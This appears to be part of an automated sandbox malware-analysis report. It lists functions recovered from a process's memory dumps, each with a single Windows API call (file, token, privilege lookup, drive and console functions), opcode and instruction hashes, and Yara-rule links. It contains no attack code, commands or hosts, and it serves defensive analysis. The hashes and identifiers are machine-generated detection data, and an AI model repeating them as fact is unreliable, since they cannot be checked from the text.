                                                    • Instruction ID: 1cd7d547f019b8fe0bcd4ffc33bf04005c26ca12f74966ff43d0f093b373a6ac
                                                    • Opcode Fuzzy Hash: 91dc4a9fca4a7e92c6fe352d43935aa2792d8aaf4fe03727c48022bcacacbcb2
                                                    • Instruction Fuzzy Hash: 31219275409380AFE722CF51DC45F56FFB8EF46314F09849BE9489B193C265A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0211A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: c4229c1f7dd7f03788bccbf10eea8b30af9143ebaf543f455ac33226b8837b63
                                                    • Instruction ID: fa637b1da240dab8a0df655927b3ed4a9b2ddb76f7543bbab5e5a472cd964fa5
                                                    • Opcode Fuzzy Hash: c4229c1f7dd7f03788bccbf10eea8b30af9143ebaf543f455ac33226b8837b63
                                                    • Instruction Fuzzy Hash: 8B21A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: fb35627a8abde64274801db5da5bd170b8a57190d478ec51df081077275f8834
                                                    • Instruction ID: ae985f7da4dcf331624c2330de445de4ec6d11cfcc5c3d0a111b2516da77656b
                                                    • Opcode Fuzzy Hash: fb35627a8abde64274801db5da5bd170b8a57190d478ec51df081077275f8834
                                                    • Instruction Fuzzy Hash: A921A175500244AFF720EF25CC85BA6FBE8EF04214F04856AED48DB282E775F908CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 2c124547741c58289afce86f024495d3ca1e93c8b41c33ececf3d07dd95b6800
                                                    • Instruction ID: b04928079d6f2e7bd377c1cc8ba70754ddc7d6ee032c2d9b8622296898819138
                                                    • Opcode Fuzzy Hash: 2c124547741c58289afce86f024495d3ca1e93c8b41c33ececf3d07dd95b6800
                                                    • Instruction Fuzzy Hash: 72119D72500304EFEB21CF51DC85FAAFBA8EF04324F14856AF9499A181D675AA048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 333a05e5dbca731988c18e759a330fabf1c8c1991ef5d15bbc9b0c3ef6f09bb4
                                                    • Instruction ID: a4d3d6459c405dc5726575b145dac6bd14840af5ac17e65f3b1f1096844b51b4
                                                    • Opcode Fuzzy Hash: 333a05e5dbca731988c18e759a330fabf1c8c1991ef5d15bbc9b0c3ef6f09bb4
                                                    • Instruction Fuzzy Hash: 86117C71604300EFEB20CF15DC85FAABBA8EF45664F14846AE909CB281D774EA448AA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: fc69e00b4d28bef15197868f4eacf0659fb98e70e884ecd14498f95b1d3b34b0
                                                    • Instruction ID: a353090aeb109ab64abc50b6f1f74f27d2a01c270e22990e72a14ac8bd6554cd
                                                    • Opcode Fuzzy Hash: fc69e00b4d28bef15197868f4eacf0659fb98e70e884ecd14498f95b1d3b34b0
                                                    • Instruction Fuzzy Hash: D2216F7550D7C09FDB12CB25DC55B92BFB4AF03214F0D84DAD988CF693D2659908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: e7148f69f5ed80965c80215d50e1882880f43b704563083c2924c24e171a22c7
                                                    • Instruction ID: 6f9cd0ba5f2827a51941e81e2210e3cc693f9a4f2401799a44f4bb65a04d140f
                                                    • Opcode Fuzzy Hash: e7148f69f5ed80965c80215d50e1882880f43b704563083c2924c24e171a22c7
                                                    • Instruction Fuzzy Hash: 732192765043809FDB21CF25DC45B96FFF4EF06220F09849AED898B562D235A449DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 5c87f79d8eeca6dc0808b0b51dc7cc2bfc3babec3115ceef69cd71f9b180d4d9
                                                    • Instruction ID: b303c50b4d241a29815d7cfbd52553b2adf9d00171a3ecfc1551f5c40b4ade5e
                                                    • Opcode Fuzzy Hash: 5c87f79d8eeca6dc0808b0b51dc7cc2bfc3babec3115ceef69cd71f9b180d4d9
                                                    • Instruction Fuzzy Hash: 8E216F765093C09FEB128B25DC55B92BFA4EF07320F0984EADD858F263D274A948DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0211AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 13c4e6558f5ef895803a6c5191e0fcd8006e9bd2696d4c69a03ea375f59d297b
                                                    • Instruction ID: d19d230d782c415175fc27cc70e4f0c7a058957c8a8f3c503648d4cba5f35caa
                                                    • Opcode Fuzzy Hash: 13c4e6558f5ef895803a6c5191e0fcd8006e9bd2696d4c69a03ea375f59d297b
                                                    • Instruction Fuzzy Hash: B02172B16053809FD722CF25DC44B52BFE8EF46610F0884AAED89CB252D375E404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028810D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 16d0914112e3269802cae088d37948878265bdc9c1e829627056cb7c3cbec586
                                                    • Instruction ID: 864b991e247c43c5374e878644cfea10f57d4183cc25f647a893a820fa8b548d
                                                    • Opcode Fuzzy Hash: 16d0914112e3269802cae088d37948878265bdc9c1e829627056cb7c3cbec586
                                                    • Instruction Fuzzy Hash: E4216D6540E3C09FD7138B259C54A62BFB4EF57620F0D80DBD8898F2A3D6696809D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 51fe9b44fa606b3d9a3bf2e39991b20c384c1ee70024c366e224d0804ead6348
                                                    • Instruction ID: c5d1316895dda5905f4faf477b4dec60bea5b37ca2bd6a393467f3b0ff83ca1a
                                                    • Opcode Fuzzy Hash: 51fe9b44fa606b3d9a3bf2e39991b20c384c1ee70024c366e224d0804ead6348
                                                    • Instruction Fuzzy Hash: 7711C172500300EFEB21DF55DC85BAAFBA8EF44720F14846AED098A281D774A904CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0211BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 6202edc0b2e54503b188217d6782c0c00eb3e8dfec7a94eae319188508e2e3a3
                                                    • Instruction ID: d27c9ae16405e9d84d4808d4ddc4fe4d16ccf4e77725b774cf21f34d33f57901
                                                    • Opcode Fuzzy Hash: 6202edc0b2e54503b188217d6782c0c00eb3e8dfec7a94eae319188508e2e3a3
                                                    • Instruction Fuzzy Hash: 2F11B172508380AFDB22CF65DC44B52FFF4EF05210F0888AEE9898B662D375E518CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 760cc7146e7c9b1d35fc098cfd40599f96b4221db276e7ad9d3c7cf91534442d
                                                    • Instruction ID: 6ce8489c89efa8af020b58e1554616f22130a21a54f38b69c05de1ced3a51ceb
                                                    • Opcode Fuzzy Hash: 760cc7146e7c9b1d35fc098cfd40599f96b4221db276e7ad9d3c7cf91534442d
                                                    • Instruction Fuzzy Hash: 68110176000304EFFB21DF50DC40FA6FBE8EF04320F04845AED089A241C270A508CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 04511fc4f85d37b1589d943e201fe6da94c7c4e4c7ff23d7604d53c463bf6321
                                                    • Instruction ID: 6989ed6f045f16e9dd250c58e1ad3ef03d75d01afd557789fb5f5c0436124d05
                                                    • Opcode Fuzzy Hash: 04511fc4f85d37b1589d943e201fe6da94c7c4e4c7ff23d7604d53c463bf6321
                                                    • Instruction Fuzzy Hash: AD118F714093C09FE7128B15DC54B62BFB4DF47614F0880DBEDC44F253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028812D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 8d22925a186b2a75102bf2fb4422ee81257b485087c52617fff2ab9a137850af
                                                    • Instruction ID: 702828adf2f580d6715306b560e790f0617f3bc3fe34e321e26203bc4d09c490
                                                    • Opcode Fuzzy Hash: 8d22925a186b2a75102bf2fb4422ee81257b485087c52617fff2ab9a137850af
                                                    • Instruction Fuzzy Hash: 6D11C1755093809FDB12CF25DC49B96FFE4EF06220F0984EEED498B252D239A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028805E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 259dd46e8c7f5641140d7a9145f936ed49e3b457583b861241e849cb245074d3
                                                    • Instruction ID: 85f46caa7ed458cb5ec75764c1dc8d73ec4ca36218f72b50edbe5d0a251d516f
                                                    • Opcode Fuzzy Hash: 259dd46e8c7f5641140d7a9145f936ed49e3b457583b861241e849cb245074d3
                                                    • Instruction Fuzzy Hash: 0711C2755093C09FDB128B15DC95B52FFB4DF43220F08C0DBED898B6A3D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0211AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 75574744408741258129dacabd6de24937690638b43efca2d95beaed0e1405a6
                                                    • Instruction ID: c4646b61892815638880a241c0d77d85795e336375114046b9fefb07d64073b6
                                                    • Opcode Fuzzy Hash: 75574744408741258129dacabd6de24937690638b43efca2d95beaed0e1405a6
                                                    • Instruction Fuzzy Hash: 271191754097C09FD7128B15DC85B91BFB4EF03224F0A80DBDD858F1A3D269A909DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0211AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 46c470e0a708fd64d5b3e62f126a456e666ebc12669ecbea59c9fbe0b1334dc6
                                                    • Instruction ID: 340841f71012dd709c848749cf5a33342a109a2796510620b045907d2a4d7af1
                                                    • Opcode Fuzzy Hash: 46c470e0a708fd64d5b3e62f126a456e666ebc12669ecbea59c9fbe0b1334dc6
                                                    • Instruction Fuzzy Hash: 211139B26412409FEB20DF29DC85B66FBE8EF05621F0884BAED49CB642D774E404CA65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: c6bfb792e862a48cc76ac394af355677a2b4f18c3bebbbb390b8dab244b4c833
                                                    • Instruction ID: cab11a8473a412e520bf91df01a53c9edb6fec9c7a5598ed7669270f34c52f36
                                                    • Opcode Fuzzy Hash: c6bfb792e862a48cc76ac394af355677a2b4f18c3bebbbb390b8dab244b4c833
                                                    • Instruction Fuzzy Hash: E2119D754093C09FE722CB25DC55B92BFB4EF07324F0980DAD9888B263C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028807C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 45608ba7796897baf6e1079bf3ffc8aeb6eba75407fcb771f13a80a8fcd95ea6
                                                    • Instruction ID: 2f66061d8c1faf62d605d60174561421556979d4b34543c8e5f1ef3809c2d1e9
                                                    • Opcode Fuzzy Hash: 45608ba7796897baf6e1079bf3ffc8aeb6eba75407fcb771f13a80a8fcd95ea6
                                                    • Instruction Fuzzy Hash: 7001D279500704EFFB20DF01DC85FA6FB98DF44721F14C096ED089B281D674A948CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028813AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: d50f42ea71986a872480d7ea9f60389e3910563d2a4be0dd0039aa04d46bd831
                                                    • Instruction ID: 39388dae38069466dd9f958e80d5f2db842232bdafe8ad4de2f331752ae4ea34
                                                    • Opcode Fuzzy Hash: d50f42ea71986a872480d7ea9f60389e3910563d2a4be0dd0039aa04d46bd831
                                                    • Instruction Fuzzy Hash: E211797A500700DBEB20DF56D889B66FBA4EB04620F08C4AAED49CB652D675E409CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0211ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 0d26269f1f13e887056efa163c1f4c95fd645aaa01c879d8d168027bb78ce1c8
                                                    • Instruction ID: d8c668f981653b40962536a0056ab9601f1cdfbb05e1dc3ab014a9642f433b5a
                                                    • Opcode Fuzzy Hash: 0d26269f1f13e887056efa163c1f4c95fd645aaa01c879d8d168027bb78ce1c8
                                                    • Instruction Fuzzy Hash: D611CEB54093809FDB11CF25DC85B82BFA8EF42220F0A80ABDD488F253D375A508CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0211BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c8d8a0b92823b73690b1283c331a8a55b1c497483c125bf10465a63969dc381d
                                                    • Instruction ID: 29dc38dd4d30543b189bab536372a41cdd5e2c9053e75919b4c84bd3fcf26afd
                                                    • Opcode Fuzzy Hash: c8d8a0b92823b73690b1283c331a8a55b1c497483c125bf10465a63969dc381d
                                                    • Instruction Fuzzy Hash: 4011A172504700DFDB21CF55DC44B52FFE4EF08314F0888AADD498A652D371E514DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0211A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 60520b481b9169b8e82a9a32842da33a3fa4313e66bf2d55f3139a1e41e77910
                                                    • Instruction ID: cac6e690b436f1dd0a32858e9fc7e24d9b404534991688d9e10fdd9e9f321595
                                                    • Opcode Fuzzy Hash: 60520b481b9169b8e82a9a32842da33a3fa4313e66bf2d55f3139a1e41e77910
                                                    • Instruction Fuzzy Hash: 62018471900600AFE310DF16DD46B66FBF8FB88A20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 1bde5642dc7742debd4a7b81cb00987b5ef52465fea1b8f2610cbeaec8df8bb2
                                                    • Instruction ID: 031af8190efbfa0854f1e1734b11434b22b390ca406d1bebbff1baa0c0f32e79
                                                    • Opcode Fuzzy Hash: 1bde5642dc7742debd4a7b81cb00987b5ef52465fea1b8f2610cbeaec8df8bb2
                                                    • Instruction Fuzzy Hash: 9D019E796007448FEB10EF25DC85766FBA8EB01224F08C4AADC09CB642D774E408CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: f66a6ba0ace0ed288dcdf4aa5bd5a881dd43a3d0607cd070bf7e58d9f168aa9b
                                                    • Instruction ID: 53ea2ba1daabca37a7df8bd62e099dd05619eb2324126ab88a604477115f2be6
                                                    • Opcode Fuzzy Hash: f66a6ba0ace0ed288dcdf4aa5bd5a881dd43a3d0607cd070bf7e58d9f168aa9b
                                                    • Instruction Fuzzy Hash: ED017171900600ABE350DF16DD46B66FBB8FB88A20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 258f6e24e4f61b64e16cde0a520d5582ed5eb57fee57353c76d037a614598a46
                                                    • Instruction ID: 46f7ba3a31300fad1327ecf166e81e64cc4e6933b86dd7d4da44cdcb0203d659
                                                    • Opcode Fuzzy Hash: 258f6e24e4f61b64e16cde0a520d5582ed5eb57fee57353c76d037a614598a46
                                                    • Instruction Fuzzy Hash: 7201DB71904240DFEB20CF15DC85BA6FBA4EF05624F08C4BADD098BA56D379EA04CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028812FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: fe5f0d0b51d1f26082a92e7be12e43d11859d9f56b8fdc585cc66d9a8fae8303
                                                    • Instruction ID: 8473bbd348c10ab4e05b0fe16b0088fadd6a787583f3e081651aa0a46231014a
                                                    • Opcode Fuzzy Hash: fe5f0d0b51d1f26082a92e7be12e43d11859d9f56b8fdc585cc66d9a8fae8303
                                                    • Instruction Fuzzy Hash: BD01BC79500340DFEF20DF15D8897A5FBA4EF05620F08C4AADD0DCB642D679A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0211A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: b0bd521338327d365cf1c57ed586d266d1691bd8746802f4f4681a60123bee37
                                                    • Instruction ID: ba6e8d48157981baa563463444f551278c034f54683a92484230a96b088dd523
                                                    • Opcode Fuzzy Hash: b0bd521338327d365cf1c57ed586d266d1691bd8746802f4f4681a60123bee37
                                                    • Instruction Fuzzy Hash: CC016D71900600ABE360DF16DD86B26FBB8FB89B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028804B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 7cf1b86f9e12d5ddf99dab2c29dc91535a9ece0dd2f2e0e7e7467d2772456786
                                                    • Instruction ID: b99828b39221c2ae6ca30f738e8a69f81eca2705c9705678c4aaf91b7a63561d
                                                    • Opcode Fuzzy Hash: 7cf1b86f9e12d5ddf99dab2c29dc91535a9ece0dd2f2e0e7e7467d2772456786
                                                    • Instruction Fuzzy Hash: 61016D71900600ABE360DF16DD86B26FBB8FB89B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: dfd4a1c1d5ca98f93da695c81925b73f9b4308cec618d363bce8bef37cca2478
                                                    • Instruction ID: cd0312b2cf06d345a8662950fc4649f258b76d9bee5ba3a93ddd0177dd7ed76d
                                                    • Opcode Fuzzy Hash: dfd4a1c1d5ca98f93da695c81925b73f9b4308cec618d363bce8bef37cca2478
